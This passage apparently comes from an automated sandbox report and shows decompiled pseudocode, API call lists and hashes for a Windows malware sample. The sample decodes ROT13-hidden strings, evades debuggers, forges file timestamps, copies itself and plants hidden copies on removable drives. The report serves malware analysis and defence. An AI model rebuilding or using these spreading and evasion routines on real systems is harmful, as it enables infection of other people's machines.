                                                                          									if(_t38 == 0) {
                                                                          										ExitProcess();
                                                                          									}
                                                                          									 *_t60 = _t38;
                                                                          									_t60 =  &(_t60[4]);
                                                                          								}
                                                                          							}
                                                                          							_t74 = _t72[0xd96e];
                                                                          							_t15 = _t72 - 0x1000; // 0x400000
                                                                          							_t67 = _t15;
                                                                          							_t53 = 0x1000;
                                                                          							VirtualProtect(_t67, 0x1000, 4, _t77);
                                                                          							_t16 = _t67 + 0x19f; // 0x40019f
                                                                          							_t40 = _t16;
                                                                          							 *_t40 =  *_t40 & 0x0000007f;
                                                                          							_t40[0x28] = _t40[0x28] & 0x0000007f;
                                                                          							_t41 = _t38;
                                                                          							_push(_t41);
                                                                          							VirtualProtect(_t67, 0x1000, _t41, _t77); // executed
                                                                          							asm("popad");
                                                                          							_t44 =  &_v128;
                                                                          							do {
                                                                          								_push(0);
                                                                          							} while (_t77 != _t44);
                                                                          							_t78 = _t77 - 0xffffff80;
                                                                          							_t75 = _t78;
                                                                          							_t77 = _t78 - 8;
                                                                          							 *(_t78 - 8) = 2;
                                                                          							 *0x41949c(_t74); // executed
                                                                          							E00401150(); // executed
                                                                          							_t73 = _t75;
                                                                          							goto __ecx;
                                                                          						}
                                                                          						_t73 = _t27;
                                                                          						goto L16;
                                                                          						L4:
                                                                          						_t53 = _t53 + _t53;
                                                                          						_t79 = _t53;
                                                                          					} while (_t79 != 0);
                                                                          				}
                                                                          			}


































                                                                          0x00436cf0
                                                                          0x00436cf1
                                                                          0x00436cf6
                                                                          0x00436cf6
                                                                          0x00436cfc
                                                                          0x00436d0a
                                                                          0x00436d0a
                                                                          0x00436d0c
                                                                          0x00436d0f
                                                                          0x00436d11
                                                                          0x00436d11
                                                                          0x00436d00
                                                                          0x00436d02
                                                                          0x00436d03
                                                                          0x00436d05
                                                                          0x00000000
                                                                          0x00436d05
                                                                          0x00436d13
                                                                          0x00436d18
                                                                          0x00436d18
                                                                          0x00436d18
                                                                          0x00436d18
                                                                          0x00436d1a
                                                                          0x00436d1c
                                                                          0x00436d1e
                                                                          0x00436d21
                                                                          0x00436d21
                                                                          0x00436d23
                                                                          0x00436d25
                                                                          0x00436d25
                                                                          0x00436d25
                                                                          0x00436d29
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00436d2b
                                                                          0x00436d2d
                                                                          0x00436d30
                                                                          0x00436d30
                                                                          0x00436d34
                                                                          0x00436d39
                                                                          0x00436d48
                                                                          0x00436d48
                                                                          0x00436d4a
                                                                          0x00436d4c
                                                                          0x00436d4e
                                                                          0x00436d51
                                                                          0x00436d51
                                                                          0x00436d53
                                                                          0x00436d55
                                                                          0x00436d55
                                                                          0x00436d57
                                                                          0x00436d59
                                                                          0x00436d5b
                                                                          0x00436d5e
                                                                          0x00436d5e
                                                                          0x00436d60
                                                                          0x00436d62
                                                                          0x00436d84
                                                                          0x00436d8a
                                                                          0x00436d8d
                                                                          0x00436d93
                                                                          0x00436da4
                                                                          0x00436da4
                                                                          0x00436da6
                                                                          0x00436da9
                                                                          0x00436dab
                                                                          0x00436dae
                                                                          0x00436dae
                                                                          0x00436db3
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00436d95
                                                                          0x00436d95
                                                                          0x00436d95
                                                                          0x00436d97
                                                                          0x00436d98
                                                                          0x00436d9a
                                                                          0x00436d9b
                                                                          0x00436d9b
                                                                          0x00000000
                                                                          0x00436d64
                                                                          0x00436d64
                                                                          0x00436d64
                                                                          0x00436d65
                                                                          0x00436d65
                                                                          0x00436d65
                                                                          0x00436d65
                                                                          0x00436d67
                                                                          0x00436d69
                                                                          0x00436d6b
                                                                          0x00436d6e
                                                                          0x00436d6e
                                                                          0x00436d70
                                                                          0x00436d72
                                                                          0x00436d72
                                                                          0x00436d72
                                                                          0x00436d76
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00436d78
                                                                          0x00436d7a
                                                                          0x00436d7d
                                                                          0x00436d7d
                                                                          0x00436d81
                                                                          0x00000000
                                                                          0x00436d81
                                                                          0x00436d62
                                                                          0x00436d3e
                                                                          0x00436d40
                                                                          0x00436d41
                                                                          0x00436d44
                                                                          0x00436dba
                                                                          0x00436dbb
                                                                          0x00436dbb
                                                                          0x00436dc6
                                                                          0x00436dc6
                                                                          0x00436dc8
                                                                          0x00436dcb
                                                                          0x00436ddd
                                                                          0x00436de9
                                                                          0x00436df0
                                                                          0x00436df2
                                                                          0x00436df2
                                                                          0x00436df8
                                                                          0x00436df8
                                                                          0x00436dfa
                                                                          0x00436dfc
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00436dfe
                                                                          0x00436e08
                                                                          0x00436e0b
                                                                          0x00436e14
                                                                          0x00436e15
                                                                          0x00436e17
                                                                          0x00436e1a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00436e20
                                                                          0x00436e29
                                                                          0x00436e2b
                                                                          0x00436e34
                                                                          0x00436e34
                                                                          0x00436e2d
                                                                          0x00436e2f
                                                                          0x00436e2f
                                                                          0x00436e15
                                                                          0x00436e3a
                                                                          0x00436e40
                                                                          0x00436e40
                                                                          0x00436e46
                                                                          0x00436e51
                                                                          0x00436e53
                                                                          0x00436e53
                                                                          0x00436e59
                                                                          0x00436e5c
                                                                          0x00436e60
                                                                          0x00436e61
                                                                          0x00436e66
                                                                          0x00436e69
                                                                          0x00436e6a
                                                                          0x00436e6e
                                                                          0x00436e6e
                                                                          0x00436e70
                                                                          0x00436e74
                                                                          0x004012a1
                                                                          0x004012a3
                                                                          0x004012a6
                                                                          0x004012ad
                                                                          0x004012b3
                                                                          0x004012c9
                                                                          0x004012ca
                                                                          0x004012ca
                                                                          0x00436d46
                                                                          0x00000000
                                                                          0x00436d06
                                                                          0x00436d06
                                                                          0x00436d06
                                                                          0x00436d06
                                                                          0x00436d11

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cb57b2637f31c4b0bb4c4548e5751da683bed98e8b91aff3b22cba038993dc89
                                                                          • Instruction ID: faa7070d73a33d3e0609266b5279e24d70364a445711d7366cdba63fb82b5a64
                                                                          • Opcode Fuzzy Hash: cb57b2637f31c4b0bb4c4548e5751da683bed98e8b91aff3b22cba038993dc89
                                                                          • Instruction Fuzzy Hash: 43516A717443436BDB218E78DC806A57BA0EB1A330F2A573AC5E1CB3C5E79C580A8768
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          C-Code - Quality: 22%
                                                                          			E00404076(void* __edx) {
                                                                          				void* _v16;
                                                                          				char _v428;
                                                                          				char _v588;
                                                                          				char _v748;
                                                                          				char _v908;
                                                                          				char _v940;
                                                                          				char _v944;
                                                                          				char* _v976;
                                                                          				int _v980;
                                                                          				int _v984;
                                                                          				char* _v988;
                                                                          				int _v992;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				void* _t43;
                                                                          				void* _t44;
                                                                          				void* _t51;
                                                                          				void* _t52;
                                                                          				void* _t53;
                                                                          				void* _t55;
                                                                          				char _t58;
                                                                          				void* _t60;
                                                                          				intOrPtr _t63;
                                                                          				char* _t90;
                                                                          				char* _t91;
                                                                          				char* _t92;
                                                                          				char* _t93;
                                                                          				void* _t96;
                                                                          				void* _t98;
                                                                          				char* _t100;
                                                                          				void* _t101;
                                                                          				char* _t102;
                                                                          				void* _t103;
                                                                          				int* _t106;
                                                                          				char** _t107;
                                                                          				char** _t109;
                                                                          				char** _t112;
                                                                          				char** _t113;
                                                                          
                                                                          				_t96 = __edx;
                                                                          				E0040B320();
                                                                          				E0040AEB0();
                                                                          				_v984 =  &_v428;
                                                                          				_v988 = 2; // executed
                                                                          				L004086C8(); // executed
                                                                          				_t106 = (_t103 - 0x000003cc & 0xfffffff0) - 8;
                                                                          				_t43 = E00404AB8();
                                                                          				_t114 = _t43;
                                                                          				if(_t43 != 0) {
                                                                          					 *_t106 = 0;
                                                                          					ExitProcess(??); // executed
                                                                          				}
                                                                          				_t44 = E004049EA(_t114); // executed
                                                                          				if(_t44 != 0) {
                                                                          					 *_t106 = 0;
                                                                          					ExitProcess(??);
                                                                          				}
                                                                          				_t98 =  &_v940;
                                                                          				asm("cld");
                                                                          				memset(_t98, 0, 7 << 2);
                                                                          				_t107 =  &(_t106[3]);
                                                                          				 *((short*)(_t98 + 7)) = 0;
                                                                          				_v988 = "user32.dll";
                                                                          				_v992 = 0x96;
                                                                          				 *_t107 =  &_v908;
                                                                          				E00404620();
                                                                          				_v992 = "fureinaf.qyy";
                                                                          				_t100 =  &_v940;
                                                                          				 *_t107 = _t100;
                                                                          				E00404C38();
                                                                          				_v988 = _t100;
                                                                          				_v992 = 0x96;
                                                                          				_t90 =  &_v588;
                                                                          				 *_t107 = _t90;
                                                                          				E00404620();
                                                                          				 *_t107 = _t90; // executed
                                                                          				_t51 = E00403F24(); // executed
                                                                          				_t101 = _t51; // executed
                                                                          				_t52 = E00403D26(_t90); // executed
                                                                          				if(_t52 != 0) {
                                                                          					_t53 = E00403E2E(_t90);
                                                                          					_t97 = 0;
                                                                          					__eflags = _t53;
                                                                          					if(_t53 == 0) {
                                                                          						_t91 =  &_v588;
                                                                          						 *_t107 = _t91;
                                                                          						_t55 = E00404ED6();
                                                                          						__eflags = _t55;
                                                                          						if(_t55 != 0) {
                                                                          							__eflags = _t101;
                                                                          							if(_t101 == 0) {
                                                                          								 *_t107 =  &_v588;
                                                                          								LoadLibraryA(??);
                                                                          								_t107 = _t107 - 4;
                                                                          							}
                                                                          							_v992 = "Fbsgjner\\Zvpebfbsg\\Jvaqbjf\\PheeragIrefvba\\Rkcybere\\ihyaiby32\\Irefvba";
                                                                          							_t102 =  &_v748;
                                                                          							 *_t107 = _t102;
                                                                          							E00404C38();
                                                                          							_v992 = "fgngrz";
                                                                          							_t92 =  &_v940;
                                                                          							 *_t107 = _t92;
                                                                          							E00404C38();
                                                                          							_v992 = _t92;
                                                                          							 *_t107 = _t102;
                                                                          							_t58 = E00404812(_t92);
                                                                          							_v944 = _t58;
                                                                          							__eflags = _t58 - 1;
                                                                          							if(_t58 <= 1) {
                                                                          								_v976 =  &_v944;
                                                                          								_v980 = 0;
                                                                          								_v984 = 0;
                                                                          								_v988 = E00403AE0;
                                                                          								_v992 = 0;
                                                                          								 *_t107 = 0;
                                                                          								CreateThread(??, ??, ??, ??, ??, ??);
                                                                          								_t107 = _t107 - 0x18;
                                                                          							}
                                                                          							 *_t107 = "SeDebugPrivilege";
                                                                          							E00404DF4();
                                                                          							 *_t107 = 0x7d0;
                                                                          							Sleep(??);
                                                                          							_t109 = _t107 - 4;
                                                                          							_t60 = E0040402C(_t92);
                                                                          							__eflags = _t60;
                                                                          							if(_t60 == 0) {
                                                                          								 *_t109 =  &_v588;
                                                                          								LoadLibraryA(??);
                                                                          								_t109 = _t109 - 4;
                                                                          							}
                                                                          							_v992 = "hfonpgvi";
                                                                          							_t93 =  &_v940;
                                                                          							 *_t109 = _t93;
                                                                          							E00404C38();
                                                                          							_v992 = _t93;
                                                                          							 *_t109 =  &_v748;
                                                                          							_t63 = E00404812(_t93);
                                                                          							_v944 = _t63;
                                                                          							__eflags = _t63 - 1;
                                                                          							if(_t63 == 1) {
                                                                          								E00406A0A();
                                                                          							}
                                                                          							E00407C4E(_t97);
                                                                          							L18:
                                                                          							 *_t109 = 0xfa0;
                                                                          							Sleep(??);
                                                                          							_t109 = _t109 - 4;
                                                                          							goto L18;
                                                                          						}
                                                                          						E00405DC4(0);
                                                                          						 *_t107 = _t91;
                                                                          						E00405D46(_t91, 0);
                                                                          						E00403C44(_t91, _t100, _t101);
                                                                          						E004056D0(0);
                                                                          						 *_t107 = _t91;
                                                                          						E004054F2(0);
                                                                          						_v992 = _t91;
                                                                          						 *_t107 =  &_v908;
                                                                          						E0040435C(_t91, _t97);
                                                                          						 *_t107 = _t91;
                                                                          						LoadLibraryA(??);
                                                                          						 *(_t107 - 4) = 0xfa0;
                                                                          						Sleep(??);
                                                                          						_t97 = 0;
                                                                          					}
                                                                          				} else {
                                                                          					E00405DC4(_t96); // executed
                                                                          					 *_t107 = _t90; // executed
                                                                          					E00405D46(_t90, _t96); // executed
                                                                          					E00403C44(_t90, _t100, _t101); // executed
                                                                          					E004056D0(_t96); // executed
                                                                          					 *_t107 = _t90; // executed
                                                                          					E004054F2(_t96); // executed
                                                                          					_v992 = _t90;
                                                                          					 *_t107 =  &_v908; // executed
                                                                          					E0040435C(_t90, _t96); // executed
                                                                          					 *_t107 = _t90; // executed
                                                                          					LoadLibraryA(??); // executed
                                                                          					_t112 = _t107 - 4;
                                                                          					 *_t112 = 0xfa0; // executed
                                                                          					Sleep(??); // executed
                                                                          					_t113 = _t112 - 4;
                                                                          					_v992 = "pgszra.rkr";
                                                                          					 *_t113 = _t100;
                                                                          					E00404C38();
                                                                          					_v992 = 0;
                                                                          					 *_t113 = _t100; // executed
                                                                          					E00405776(_t90); // executed
                                                                          					_t97 = 0;
                                                                          				}
                                                                          				return _t97;
                                                                          			}










































                                                                          0x00404076
                                                                          0x0040408a
                                                                          0x0040408f
                                                                          0x0040409a
                                                                          0x0040409e
                                                                          0x004040a5
                                                                          0x004040aa
                                                                          0x004040ad
                                                                          0x004040b2
                                                                          0x004040b4
                                                                          0x004040b6
                                                                          0x004040bd
                                                                          0x004040bd
                                                                          0x004040c2
                                                                          0x004040c9
                                                                          0x004040cb
                                                                          0x004040d2
                                                                          0x004040d2
                                                                          0x004040d7
                                                                          0x004040dd
                                                                          0x004040e8
                                                                          0x004040e8
                                                                          0x004040ea
                                                                          0x004040ef
                                                                          0x004040f7
                                                                          0x00404105
                                                                          0x00404108
                                                                          0x0040410d
                                                                          0x00404115
                                                                          0x0040411b
                                                                          0x0040411e
                                                                          0x00404123
                                                                          0x00404127
                                                                          0x0040412f
                                                                          0x00404135
                                                                          0x00404138
                                                                          0x0040413d
                                                                          0x00404140
                                                                          0x00404145
                                                                          0x00404147
                                                                          0x0040414e
                                                                          0x004041c5
                                                                          0x004041ca
                                                                          0x004041cf
                                                                          0x004041d1
                                                                          0x004041d7
                                                                          0x004041dd
                                                                          0x004041e0
                                                                          0x004041e5
                                                                          0x004041e7
                                                                          0x0040423e
                                                                          0x00404240
                                                                          0x00404248
                                                                          0x0040424b
                                                                          0x00404250
                                                                          0x00404250
                                                                          0x00404253
                                                                          0x0040425b
                                                                          0x00404261
                                                                          0x00404264
                                                                          0x00404269
                                                                          0x00404271
                                                                          0x00404277
                                                                          0x0040427a
                                                                          0x0040427f
                                                                          0x00404283
                                                                          0x00404286
                                                                          0x0040428b
                                                                          0x00404291
                                                                          0x00404294
                                                                          0x0040429c
                                                                          0x004042a0
                                                                          0x004042a8
                                                                          0x004042b0
                                                                          0x004042b8
                                                                          0x004042c0
                                                                          0x004042c7
                                                                          0x004042cc
                                                                          0x004042cc
                                                                          0x004042cf
                                                                          0x004042d6
                                                                          0x004042db
                                                                          0x004042e2
                                                                          0x004042e7
                                                                          0x004042ea
                                                                          0x004042ef
                                                                          0x004042f1
                                                                          0x004042f9
                                                                          0x004042fc
                                                                          0x00404301
                                                                          0x00404301
                                                                          0x00404304
                                                                          0x0040430c
                                                                          0x00404312
                                                                          0x00404315
                                                                          0x0040431a
                                                                          0x00404324
                                                                          0x00404327
                                                                          0x0040432c
                                                                          0x00404332
                                                                          0x00404335
                                                                          0x00404337
                                                                          0x00404337
                                                                          0x0040433c
                                                                          0x00404341
                                                                          0x00404341
                                                                          0x00404348
                                                                          0x0040434d
                                                                          0x00000000
                                                                          0x0040434d
                                                                          0x004041e9
                                                                          0x004041ee
                                                                          0x004041f1
                                                                          0x004041f6
                                                                          0x004041fb
                                                                          0x00404200
                                                                          0x00404203
                                                                          0x00404208
                                                                          0x00404212
                                                                          0x00404215
                                                                          0x0040421a
                                                                          0x0040421d
                                                                          0x00404225
                                                                          0x0040422c
                                                                          0x00404234
                                                                          0x00404234
                                                                          0x00404150
                                                                          0x00404150
                                                                          0x00404155
                                                                          0x00404158
                                                                          0x0040415d
                                                                          0x00404162
                                                                          0x00404167
                                                                          0x0040416a
                                                                          0x0040416f
                                                                          0x00404179
                                                                          0x0040417c
                                                                          0x00404181
                                                                          0x00404184
                                                                          0x00404189
                                                                          0x0040418c
                                                                          0x00404193
                                                                          0x00404198
                                                                          0x0040419b
                                                                          0x004041a3
                                                                          0x004041a6
                                                                          0x004041ab
                                                                          0x004041b3
                                                                          0x004041b6
                                                                          0x004041bb
                                                                          0x004041bb
                                                                          0x0040435b

                                                                          APIs
                                                                          • WSAStartup.WS2_32 ref: 004040A5
                                                                            • Part of subcall function 00404AB8: IsDebuggerPresent.KERNEL32(004040B2), ref: 00404AC1
                                                                          • ExitProcess.KERNEL32 ref: 004040BD
                                                                            • Part of subcall function 00403E2E: CreateMutexA.KERNEL32 ref: 00403E5B
                                                                            • Part of subcall function 00403E2E: GetLastError.KERNEL32 ref: 00403E63
                                                                            • Part of subcall function 00404ED6: fopen.MSVCRT ref: 00404EEA
                                                                            • Part of subcall function 00404ED6: fclose.MSVCRT ref: 00404EFB
                                                                          • ExitProcess.KERNEL32 ref: 004040D2
                                                                          • LoadLibraryA.KERNEL32 ref: 00404184
                                                                          • Sleep.KERNEL32 ref: 00404193
                                                                          • LoadLibraryA.KERNEL32 ref: 0040421D
                                                                          • Sleep.KERNEL32 ref: 0040422C
                                                                          • LoadLibraryA.KERNEL32 ref: 0040424B
                                                                          • CreateThread.KERNEL32 ref: 004042C7
                                                                          • Sleep.KERNEL32 ref: 004042E2
                                                                          • LoadLibraryA.KERNEL32 ref: 004042FC
                                                                          • Sleep.KERNEL32 ref: 00404348
                                                                            • Part of subcall function 00405DC4: CreateFileA.KERNEL32 ref: 00405E5E
                                                                            • Part of subcall function 00405DC4: ExitProcess.KERNEL32 ref: 00405E7E
                                                                            • Part of subcall function 00405DC4: CloseHandle.KERNEL32 ref: 00405E9E
                                                                            • Part of subcall function 00405D46: CreateFileA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004041F6), ref: 00405D83
                                                                            • Part of subcall function 00405D46: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004041F6), ref: 00405DB7
                                                                            • Part of subcall function 004056D0: GetModuleFileNameA.KERNEL32 ref: 004056F4
                                                                            • Part of subcall function 004056D0: CopyFileA.KERNEL32 ref: 0040573B
                                                                            • Part of subcall function 004054F2: CreateFileA.KERNEL32 ref: 00405531
                                                                            • Part of subcall function 004054F2: SetFilePointer.KERNEL32 ref: 00405574
                                                                            • Part of subcall function 004054F2: WriteFile.KERNEL32 ref: 0040559A
                                                                            • Part of subcall function 004054F2: Sleep.KERNEL32 ref: 004055A9
                                                                            • Part of subcall function 004054F2: SetFilePointer.KERNEL32 ref: 004055D4
                                                                            • Part of subcall function 004054F2: WriteFile.KERNEL32 ref: 004055FA
                                                                            • Part of subcall function 004054F2: Sleep.KERNEL32 ref: 00405609
                                                                            • Part of subcall function 004054F2: SetFilePointer.KERNEL32 ref: 00405634
                                                                            • Part of subcall function 004054F2: WriteFile.KERNEL32 ref: 0040565A
                                                                            • Part of subcall function 004054F2: SetFilePointer.KERNEL32 ref: 0040567D
                                                                            • Part of subcall function 004054F2: WriteFile.KERNEL32 ref: 004056AF
                                                                            • Part of subcall function 004054F2: CloseHandle.KERNEL32 ref: 004056C0
                                                                            • Part of subcall function 0040435C: CreateFileA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404399
                                                                            • Part of subcall function 0040435C: GetFileTime.KERNEL32 ref: 004043CD
                                                                            • Part of subcall function 0040435C: CloseHandle.KERNEL32 ref: 004043E5
                                                                            • Part of subcall function 0040435C: CreateFileA.KERNEL32 ref: 00404423
                                                                            • Part of subcall function 0040435C: SetFileTime.KERNEL32 ref: 00404453
                                                                            • Part of subcall function 0040435C: CloseHandle.KERNEL32 ref: 00404467
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: File$Create$Sleep$CloseHandle$LibraryLoadPointerWrite$ExitProcess$Time$CopyDebuggerErrorLastModuleMutexNamePresentStartupThreadfclosefopen
                                                                          • String ID: Fbsgjner\Zvpebfbsg\Jvaqbjf\PheeragIrefvba\Rkcybere\ihyaiby32\Irefvba$SeDebugPrivilege$fgngrz$fureinaf.qyy$hfonpgvi$pgszra.rkr$user32.dll
                                                                          • API String ID: 2057360409-330933156
                                                                          • Opcode ID: 199cad912980a4fc92ecc50461b3e6f79d7811f6d2aad3494388b950cac20798
                                                                          • Instruction ID: 0cfcdf05f74210d9808c357536bce9e529f0bcd84bc5eb1993387659449c0d65
                                                                          • Opcode Fuzzy Hash: 199cad912980a4fc92ecc50461b3e6f79d7811f6d2aad3494388b950cac20798
                                                                          • Instruction Fuzzy Hash: 67610EB09087048AD710BF75C58625EBAE4AF81308F41997FE9C4776C2DB7C96888F5B
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          C-Code - Quality: 62%
                                                                          			E10002CEF(signed int __edx) {
                                                                          				void* _v16;
                                                                          				char _v188;
                                                                          				char _v316;
                                                                          				char _v348;
                                                                          				char _v508;
                                                                          				char _v509;
                                                                          				void _v604;
                                                                          				void* _v612;
                                                                          				int _v616;
                                                                          				void* _v620;
                                                                          				void* __ebx;
                                                                          				signed int _t44;
                                                                          				void* _t50;
                                                                          				int _t52;
                                                                          				CHAR* _t54;
                                                                          				signed int _t62;
                                                                          				signed int _t63;
                                                                          				int _t65;
                                                                          				void* _t66;
                                                                          				void* _t68;
                                                                          				void* _t69;
                                                                          				void* _t70;
                                                                          				void* _t71;
                                                                          				void** _t72;
                                                                          				intOrPtr* _t73;
                                                                          				void** _t74;
                                                                          
                                                                          				_t63 = __edx;
                                                                          				memcpy( &_v604, 0x10004000, 0x60);
                                                                          				E10001F26( &_v316, "Fbsgjner\\Zvpebfbsg\\Jvaqbjf\\PheeragIrefvba\\Rkcybere\\ihyaiby32\\Irefvba");
                                                                          				E10001F26( &_v348, "hfonpgvi");
                                                                          				_t44 = E10002B9C( &_v348,  &_v316,  &_v348); // executed
                                                                          				_t65 = 0;
                                                                          				if(((_t44 & 0xffffff00 | _t44 == 0x00000042 | _t63 & 0xffffff00 | _t44 == 0x00000000) & 0x00000001) == 0) {
                                                                          					_v616 = "tepbcl.qyy";
                                                                          					_v620 =  &_v348;
                                                                          					E10001F26();
                                                                          					E10002209( &_v188, 0x96,  &_v348);
                                                                          					_t50 = E1000271B( &_v188);
                                                                          					_t65 = 0;
                                                                          					if(_t50 != 0) {
                                                                          						_t66 =  &_v508;
                                                                          						while(1) {
                                                                          							Sleep(0x2328);
                                                                          							_t71 = _t70 - 4;
                                                                          							_t62 = 0;
                                                                          							do {
                                                                          								_t52 = GetDriveTypeA( *(_t69 + _t62 * 4 - 0x258));
                                                                          								_t71 = _t71 - 4;
                                                                          								if(_t52 == 2) {
                                                                          									_t68 =  &_v508;
                                                                          									memset(_t68, 0, 0x96);
                                                                          									_t54 =  *(_t69 + _t62 * 4 - 0x258);
                                                                          									_v616 = _t54;
                                                                          									_v620 = _t68;
                                                                          									L100034B8();
                                                                          									_v620 = _t68;
                                                                          									L10003570();
                                                                          									_t72 = _t71 - 4;
                                                                          									if(_t54[(char*)( &_v509)] != 0x5c) {
                                                                          										_v620 = 0x1000508e;
                                                                          										 *_t72 = _t68;
                                                                          										L10003578();
                                                                          										_t72 = _t72 - 8;
                                                                          									}
                                                                          									_v620 = 0x100060a4;
                                                                          									 *_t72 = _t66;
                                                                          									L100034B8();
                                                                          									 *_t72 = 1;
                                                                          									SetErrorMode(??);
                                                                          									_t73 = _t72 - 4;
                                                                          									_v616 = 0;
                                                                          									_v620 = _t66;
                                                                          									 *_t73 =  &_v188;
                                                                          									CopyFileA(??, ??, ??);
                                                                          									_t74 = _t73 - 0xc;
                                                                          									_v620 = 2;
                                                                          									 *_t74 = _t66;
                                                                          									SetFileAttributesA(??, ??);
                                                                          									_t71 = _t74 - 8;
                                                                          								}
                                                                          								_t62 = 1 + _t62;
                                                                          							} while (_t62 <= 0x17);
                                                                          						}
                                                                          					}
                                                                          				}
                                                                          				return _t65;
                                                                          			}





























                                                                          0x10002cef
                                                                          0x10002d14
                                                                          0x10002d2a
                                                                          0x10002d40
                                                                          0x10002d4c
                                                                          0x10002d5e
                                                                          0x10002d65
                                                                          0x10002d6b
                                                                          0x10002d79
                                                                          0x10002d7c
                                                                          0x10002d96
                                                                          0x10002d9e
                                                                          0x10002da3
                                                                          0x10002daa
                                                                          0x10002db0
                                                                          0x10002db6
                                                                          0x10002dbd
                                                                          0x10002dc2
                                                                          0x10002dc5
                                                                          0x10002dca
                                                                          0x10002dd4
                                                                          0x10002dd9
                                                                          0x10002ddf
                                                                          0x10002de5
                                                                          0x10002dfe
                                                                          0x10002e03
                                                                          0x10002e0a
                                                                          0x10002e0e
                                                                          0x10002e11
                                                                          0x10002e16
                                                                          0x10002e19
                                                                          0x10002e1e
                                                                          0x10002e29
                                                                          0x10002e2b
                                                                          0x10002e33
                                                                          0x10002e36
                                                                          0x10002e3b
                                                                          0x10002e3b
                                                                          0x10002e3e
                                                                          0x10002e46
                                                                          0x10002e49
                                                                          0x10002e4e
                                                                          0x10002e55
                                                                          0x10002e5a
                                                                          0x10002e5d
                                                                          0x10002e65
                                                                          0x10002e6f
                                                                          0x10002e72
                                                                          0x10002e77
                                                                          0x10002e7a
                                                                          0x10002e82
                                                                          0x10002e85
                                                                          0x10002e8a
                                                                          0x10002e8a
                                                                          0x10002e8d
                                                                          0x10002e8e
                                                                          0x10002e97
                                                                          0x10002db6
                                                                          0x10002daa
                                                                          0x10002ea5

                                                                          APIs
                                                                          • memcpy.MSVCRT ref: 10002D14
                                                                          • rot13.SHERVANS ref: 10002D2A
                                                                            • Part of subcall function 10001F26: rot13c.SHERVANS ref: 10001F40
                                                                          • rot13.SHERVANS ref: 10002D40
                                                                          • get_dword.SHERVANS ref: 10002D4C
                                                                            • Part of subcall function 10002B9C: RegOpenKeyExA.ADVAPI32 ref: 10002BD6
                                                                            • Part of subcall function 10002B9C: RegOpenKeyExA.ADVAPI32 ref: 10002C04
                                                                            • Part of subcall function 10002B9C: RegQueryValueExA.ADVAPI32 ref: 10002C3F
                                                                            • Part of subcall function 10002B9C: RegCloseKey.ADVAPI32 ref: 10002C4F
                                                                          • rot13.SHERVANS ref: 10002D7C
                                                                          • add_system_direcroty.SHERVANS ref: 10002D96
